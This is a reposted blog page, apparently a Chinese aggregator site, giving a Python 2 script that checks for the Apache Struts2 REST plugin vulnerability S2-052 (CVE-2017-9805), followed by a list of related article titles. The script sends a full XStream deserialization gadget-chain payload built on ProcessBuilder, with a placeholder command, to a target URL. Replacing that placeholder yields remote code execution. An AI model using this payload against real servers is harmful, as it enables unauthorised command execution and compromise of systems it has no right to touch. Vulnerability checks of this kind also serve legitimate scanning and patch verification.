S2-052 CVE-2017-9805 python脚本
来源:互联网 发布:电商销售数据分析报告 编辑:程序博客网 时间:2024/06/05 07:39
S2-052 CVE-2017-9805 python检查,只对没有处理500的服务有效
#!/usr/bin/env python#coding=utf-8# CVE-2017-9805import requestsdef run(params): url = params['IP'] ip = params['PORT'] PoC = '''<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>xxx</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map> ''' headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'Content-Type': 'application/xml', 'Content-Length': '16630', 'Connection': 'close', 'Upgrade-Insecure-Requests': '1'} try: d = requests.post(url,data=PoC, headers=headers, timeout=3) if d.status_code == 500 and not d.content.find('java.security.Provider$Service') == -1: return {'result':'1', 'originalResult':d.content} else: return {'result':'0', 'originalResult':''} except Exception,ex: return {'result':'0', 'originalResult':'connect error'} if __name__ == "__main__": print run({'IP':'http://192.168.15.81:9999/struts2-rest-showcase/orders', 'PORT':'80'})
阅读全文
0 0
- S2-052 CVE-2017-9805 python脚本
- S2-052(CVE-2017-9805)
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- 【高危漏洞预警】CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052)
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- 【S2-052】Struts2远程命令执行漏洞(CVE-2017-9805)
- struts2升级到2.3.32版本,防止漏洞编号S2-045,CVE编号:cve-2017-5638
- struts2升级到2.3.32版本,防止漏洞编号S2-045,CVE编号:cve-2017-5638
- Apache Struts2 曝任意代码执行漏洞 (S2-045,CVE-2017-5638)
- 【S2-053】Struts2远程命令执行漏洞(CVE-2017-12611)
- 使用Python脚本来导入CVE数据到MySQL
- struts2 CVE-2013-4316 S2-019 Dynamic method executions Vul
- [漏洞] CVE-2017-1000364/CVE-2017-1000365/CVE-2017-1000366
- [python] CVE信息大集合
- Struts2 S2-052
- CVE-2017-8759
- Codeforces 570D Tree Requests
- HTTP协议简介
- 大数据预科班作业5~6
- redis学习(1)简介,安装及配置
- 基于微软案例数据挖掘之Microsoft 线性回归分析算法
- S2-052 CVE-2017-9805 python脚本
- 嵌入式每日学习心得 进程与线程
- python for 循环 遍历 两个 List
- centos6.5下oracle11g开机自动启动方法一
- Vue注册组件报错--Uncaught SyntaxError: Invalid or unexpected token
- 关于javascript和servlet的ajax入门模版
- break,continue,return的区别
- 在一个重男轻女的国家里,每个家庭都想生男孩,如果他们生的孩子是女孩,就再生一个,直到生下的是男孩为止。这样的国家,男女比例会是多少?
- 插入排序-java